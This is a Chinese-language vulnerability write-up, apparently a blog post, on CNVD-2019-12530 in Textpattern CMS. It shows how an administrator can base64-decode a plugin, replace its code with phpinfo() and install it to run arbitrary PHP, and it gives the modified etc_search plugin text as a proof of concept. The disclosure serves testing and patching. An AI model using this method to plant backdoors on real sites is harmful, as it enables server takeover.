TextpatternCMS安装插件时可以安装后门导致getshell

该漏洞CNVD-ID: CNVD-2019-12530
漏洞提交CNVD后,待CNVD公示才发出本文。
测试环境:windows7 + firefox + Burpsuite + apache2 +php5.6.27 + mysql5.5.53
产品官网:https://textpattern.com/
github: https://github.com/textpattern/textpattern
系统安装环境要求:https://textpattern.com/about/119/system-requirements

一、漏洞分析

/textpattern/index.php?event=plugin 这里可以安装插件,这本是一个自带功能。但如果被恶意利用,则可以安装一个后门导致getshell。
/textpattern/lib/txplib_misc.php 文件中的function load_plugins()函数line 1870 这里会执行插件的代码。
将插件的code部分替换成后门代码后安装即可。
在这里插入图片描述

二、漏洞测试

需要登录管理后台。
官网下载任一插件
https://textpattern.org/plugins/1324/etc_search 这里选择etc_search作演示。
在这里插入图片描述
插件是一个文本文件,分两部分。
第一部分:前面有一段包含插件信息的标题(插件名称、版本和说明、作者名称等);第二部分:base64加密的代码和帮助。
在这里插入图片描述复制所有base64加密的内容,进行解密。
比如这个网站可以解密:http://www.bejson.com/enc/base64/
在这里插入图片描述将解密后的代码复制到notepad++中。
修改 s:4:"code";s:24918:"// TXP 4.6 tag registration……" (共计24918个字符),在notepad里位于第1行----558行。
修改为: s:4:"code";s:10:"phpinfo();";

修改前:
在这里插入图片描述修改后:
在这里插入图片描述将修改后的代码再进行base64加密。
在这里插入图片描述复制新的base64加密内容替换原内容。
在这里插入图片描述来到 /textpattern/index.php?event=plugin 页面安装插件。将处理过的内容粘贴到这里安装。
在这里插入图片描述在这里插入图片描述激活插件。
在这里插入图片描述就可以在很多页面看到结果。
比如后台首页/textpattern/index.php ,或者前台首页。

在这里插入图片描述在这里插入图片描述

三、POC

写入phpinfo()后的插件文本,可直接复制用于测试。

# Name: etc_search v0.9.5 
# Type: Admin/Public plugin
# Search in any table(s)
# Author: Oleg Loukianov
# URL: http://www.iut-fbleau.fr/projet/etc/
# Recommended load order: 7

# .....................................................................
# This is a plugin for Textpattern CMS - http://textpattern.com/
# To install: textpattern > admin > plugins
# Paste the following text into the 'Install plugin' box:
# .....................................................................

a:11:{s:4:"name";s:10:"etc_search";s:6:"author";s:14:"Oleg Loukianov";s:10:"author_uri";s:36:"http://www.iut-fbleau.fr/projet/etc/";s:7:"version";s:5:"0.9.5";s:11:"description";s:22:"Search in any table(s)";s:4:"code";s:10:"phpinfo();";s:4:"type";s:1:"1";s:5:"order";s:1:"7";s:5:"flags";s:1:"3";s:4:"help";s:13136:"<h3>Description</h3>

	<p>This plugin displays a search form similarly to <code>&lt;txp:search_input /&gt;</code>. If Javascript is enabled, a results list will fade in and resize in real time below the search box with a nice animation effect as the user types his query. When the search box is empty, the results list shrinks and fades out.</p>

	<p>The search is advanced, i.e. "jaguar speed -car" will display the results containing the strings "jaguar" and "speed", but not "car". The syntax is customizable by modifying <code>Search settings</code> JSON encoded preference. Moreover, you can instruct the plugin to do faceted searches and query any fields in your txp database.</p>

	<p>When the user hits the Enter key he gets redirected to a traditional search results page, so the plugin also degrades nicely in non-Javascript browsers.</p>

	<p>Nearly everything (input form, output form, animation, search query) is customizable. Moreover, you can use <code>etc_search</code> to query your txp database without user interaction, extending the capabilities of <code>article_custom</code> and other list tags..</p>

	<h3>Requirements</h3>

<p>The plugin is composed of two files: <code>etc_search.txt</code> and <code>livesearch.jquery.js</code>. The first one is compressed <code>php</code> file to be installed as usual in <code>Plugins</code> tab. On install it will create a <code>etc_search</code> table and two preferences that will be removed on uninstall. It will also create an article form (that you can modify) named <code>etc_search_results</code> that will be used as default live search output.</p>

	<h4>Javascript</h4>

	<p>jQuery <strong>1.2</strong> or more recent is required.</p>

	<p>You can use the <code>jquery.js</code> javascript file which is bundled with Textpattern and you need to upload the provided <code>livesearch.jquery.js</code> file to your web server (for example in a folder called &#8220;/js/&#8221;) and include both of these files in the header of the web pages where you want to use the plugin:</p>

<pre><code>&lt;script type=&quot;text/javascript&quot; src=&quot;textpattern/jquery.js&quot;&gt;&lt;/script&gt;
&lt;script type=&quot;text/javascript&quot; src=&quot;js/livesearch.jquery.js&quot;&gt;&lt;/script&gt;
</code></pre>

	<h3>Syntax</h3>

<h4>Input form/live search</h4>
<pre><code>&lt;txp:etc_search /&gt;
</code></pre>
<p>or as container:</p>
<pre><code>&lt;txp:etc_search&gt;
  &lt;input name="a" /&gt;
  &lt;input name="b" /&gt;
  ...
&lt;/txp:etc_search&gt;
</code></pre>

<h4>Output results</h4>
<pre><code>&lt;txp:etc_search_results /&gt;
</code></pre>
<p>or as container:</p>
<pre><code>&lt;txp:etc_search_results&gt;
  output pattern
&lt;txp:else /&gt;
  &lt;txp:text item="no_search_matches" /&gt;
&lt;/txp:etc_search_results&gt;
</code></pre>

	<h3>Attributes of <code>etc_search</code> tag</h3>

	<h4>Required</h4>

	<p>none.</p>

	<h4>Optional</h4>

	<ul>
		<li><strong>id</strong>: Comma-separated list of query identifiers (see below), default is <code>0</code> (default search).</li>
		<li><strong>live</strong>: Milliseconds of user inactivity before live search starts, <code>600</code> by default. Set it to <code>0</code> to disable the live search, or to <code>-600</code> to make the results persist on the screen even after loosing the focus.</li>
		<li><strong>minlength</strong>: Minimal length of user input before live search starts, <code>1</code> by default.</li>
		<li><strong>match</strong>: Search mode, set it to <code>exact</code> if necessary.</li>
		<li><strong>format</strong>: Allows to glue multiple URL <code>{variables}</code> (generally produced by <code>&lt;txp:etc_search /&gt;</code> used as container) into one search string. For example, <code>format="{q} @{c}"</code> will pass the string <code>?c=tips&q=pag&...</code> as "pag @tips" search query to <code>etc_search</code>. Default is <code>{q}</code>, the value of txp search string parameter.</li>
		<li><strong>action</strong>: URL of the page to redirect the user to when he hits the Enter key, in order to display the standard search results page. Default is the home page.</li>
		<li><strong>html_id</strong>: <span class="caps">HTML</span> <code>id</code> attribute that will be applied to the search form. Default is <code>live_search_[some_random_id]</code>.</li>
		<li><strong>class</strong>: <span class="caps">HTML</span> <code>class</code> attribute of the search form, <code>ls_search</code> by default.</li>
		<li><strong>target</strong>: jQuery selector, set it if you want to display live search results elsewhere.</li>
		<li><strong>form</strong>: Optional Textpattern form for live search results output.</li>
		<li><strong>label</strong>: Displays a label above the search box with the specified text. Default is &#8220;search&#8221; string localized in the language of your Textpattern installation.</li>
		<li><strong>size</strong>: Size of the search box (number of characters).</li>
		<li><strong>placeholder</strong>: Invitation text that will de displayed in the box. This text disappears when user has typed something into it. Default is empty.</li>
		<li><strong>limit</strong>: Maximum number of results in the live results list. Default is <code>0</code> (no limit).</li>
		<li><strong>wraptag</strong>: <span class="caps">HTML</span> tag to wrap the search results with, inside the form. Default is empty.</li>
		<li><strong>break</strong>: <span class="caps">HTML</span> tag to be used for line breaks in the content inside the live results list, without brackets. Default is <code>br</code>.</li>
	</ul>

<h3>Admin-side settings</h3>

<p>Go to <code>Extensions/etc_search</code> to change them.</p>

<h4>Search settings</h4>
<ul>
<li><strong>Logical operations</strong>: JSON-encoded object containing MySQL operators to be used in search queries.</li>
</ul>

<h4>Search forms</h4>
<ul>
<li><strong>context</strong>: One of <code>article | file | image | link</code>, representing the table to search in, or <code>custom</code>. If not custom, you can use (some of) context tags in forms, see below.</li>
		<li><strong>query</strong>: A string patterns representing a valid MySQL SELECT query, with specially crafted WHERE clause. It is of the form <code>SELECT ... WHERE {[?param::]match1;match2;...} AND/OR other_criteria ...</code>. The <code>{match}</code> token will be replaced by the plugin with appropriate string. A query pattern can be reduced to <code>{match1;match2;...} ...</code> if some non-custom context is set.<br />
Here <code>param</code> is a url variable to be used in the item. If omitted, the default search parameter <code>q</code> will be used.<br />
Each <code>match</code> item is a string <code>fields::pattern::condition</code>, where
<ul>
<li><code>fields</code> is a comma-separated list of db fields;</li>
<li><code>pattern</code> is a regexp to match search query against, <code>/^.+$/s</code> (any query) by default;</li>
<li><code>condition</code> is a MySQL WHERE clause (its default value is <code>{*} LIKE %search_term%</code>) to filter <code>fields</code> with. Here,  the <code>{*}</code> token will be replaced by <code>fields</code> names, and <code>$n</code> tokens will be taken from search queries matching <code>pattern</code>.</li>
</ul>
		<li><strong>form</strong>: Two output forms to use for displaying the results, in live and standard mode. If empty, will be assigned the value of <code>etc_search_results, search_results</code>.</li>
<li>Finally, <strong>content</strong> consists of two output patterns where all occurrences of <code>{field}</code> will be replaced by the corresponding (escaped) field value. The first pattern will be used for the live search, the second one for the standard search.</li></ul>
</li>
</ul>

	<h3>Examples</h3>
<p>By default, <code>etc_search</code> acts like the built-in Textpattern search, querying articles <code>Title</code> and <code>Body</code>. If you want to make searchable also <code>Keywords</code> and <code>Excerpt</code>, create an article query <code>{Title,Body,Keywords,Excerpt}</code> (say, number 1), and call</p>
<pre><code>&lt;txp:etc_search id="1" /&gt;</code></pre>

<p>Suppose now that you wish to extend the default Textpattern search with faceted search for some text in images <code>caption</code> attribute, and display the titles of the articles which are associated (via Article image) with the matching images. To indicate that you are searching in captions, you decide to prefix terms by <code>cap:</code>. Then you can create the following article context query (say, number 2) and forms:</p>

<pre><code>query: SELECT txp.*,img.caption FROM textpattern txp JOIN txp_image img ON FIND_IN_SET(img.id,txp.Image) WHERE {img.caption::/^cap:(.+)$/::{*} LIKE '%$1%'}
live form: &lt;a href='&lt;txp:permlink /&gt;' title='{caption}'&gt;&lt;txp:title /&gt;&lt;/a&gt;
static form: &lt;h3&gt;&lt;txp:permlink&gt;&lt;txp:title /&gt;&lt;/txp:permlink&gt;&lt;/h3&gt;&lt;txp:excerpt /&gt;
</code></pre>
 <p>and use <code>&lt;txp:etc_search id="0,2" /&gt;</code>.</p>

<h3>The <code>etc_search_results</code> tag</h3>

<p>You can replace the default (non-live) TXP search with <code>&lt;txp:etc_search_results /&gt;</code> by placing this tag instead of <code>&lt;txp:article /&gt;</code> in <code>if_search</code> section of your pages. The tag currently accepts the standard <code>html_id</code>, <code>form</code>, <code>wraptag</code>, <code>break</code> and <code>limit</code> attributes. If <code>form</code> or <code>content</code> are set, they will be common to all search queries, overwriting their own forms.</p>

<p>The <code>id</code> attribute allows to restrict search to a list of comma-separated search form ids. If this list is preceded by <code>-</code>, the corresponding forms will be excluded. You can place two or more mutually exclusive <code>&lt;txp:etc_search_results /&gt;</code> tags on the page:</p>
<pre><code>&lt;txp:etc_search_results id="1,2" form="form1" /&gt;
&lt;txp:etc_search_results id="3" form="form2" /&gt;
</code></pre>

<p>The <code>query</code> attribute allows to pass a search string directly to <code>&lt;txp:etc_search_results /&gt;</code>. For example, <code>query="red blue"</code> will be treated as <code>?q=red+blue</code> and output (with the default search) all the articles containing both "red" and "blue". This allows to use <code>&lt;txp:etc_search_results /&gt;</code> as <code>&lt;txp:article_custom /&gt;</code> with very customizable <code>where</code> attribute.</p>

<h3>The <code>etc_search_result_excerpt</code> tag</h3>

<p>You can also replace <code>&lt;txp:search_result_excerpt /&gt;</code> with <code>&lt;txp:etc_search_result_excerpt /&gt;</code> where appropriate. It accepts some additional attributes:</p>
<ul>
<li><code>type="article"</code>;</li>
<li><code>field="body"</code>;</li>
<li><code>size="50"</code>: the maximum number of surrounding characters;</li>
<li><code>showalways="0"</code>: show an excerpt even if there is no match.</li>
</ul>


<h3>The <code>etc_search_result_count</code> tag</h3>
<p>Accepts only <code>text</code> attribute. The tokens <code>{from}, {to}, {total}, {page}, {pages}</code> therein will be replaced by corresponding values, to display a string like <code>Results 6 to 10 of 27</code>.</p>

	<h3><span class="caps">CSS</span>Styling</h3>

	<p>The live search consists of a form with the <code>id</code> attribute value set by the &#8220;html_id&#8221; parameter. This form contains two zones. You can style any element by referencing the id attribute of the form and the <span class="caps">CSS</span> class of the element (or its tag) in your <span class="caps">CSS</span>.</p>

	<h4>The search zone</h4>

	<p>The first zone is a block with the applied class &#8220;ls_search&#8221; which contains: the optional label (followed by a line break if defined) and the text input box. The tag of this block is defined by the &#8220;wraptag&#8221; parameter (default is <code>div</code>).</p>

	<p>The default search box is an input tag. If you want, you can style it using a <span class="caps">CSS</span> rule like this one:</p>

<pre><code>#live_search input {
    font-size: 10px;
    color: #000;
}
</code></pre>

	<h4>The results zone</h4>

	<p>The results zone is a <code>div</code> block with the class &#8220;ls_search&#8221;, containing the results list. You can choose to position this block absolutely, or even replace it with any block, setting <code>target</code> attribute.</p>

	<p>If you are not happy with the default animation, unbind <code>update.html_id</code> event of the <code>target</code> and replace them with your own jQuery animations. You can also set <code>start</code> and <code>stop</code> events, fired at the beginning and the end of live AJAX requests.</p>

	<p>The content of the results block will be either:</p>

	<ol>
		<li><em>At least one result is found:</em> A list with wrap and break tags according to your &#8220;wraptag&#8221; and &#8220;break&#8221; parameters (see above).</li>
		<li><em>No results found:</em> The localized &#8220;no_search_matches&#8221; message.</li>
	</ol>";s:3:"md5";s:32:"7e2940921cff6e49b7a0fc84d3ca55ca";}
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值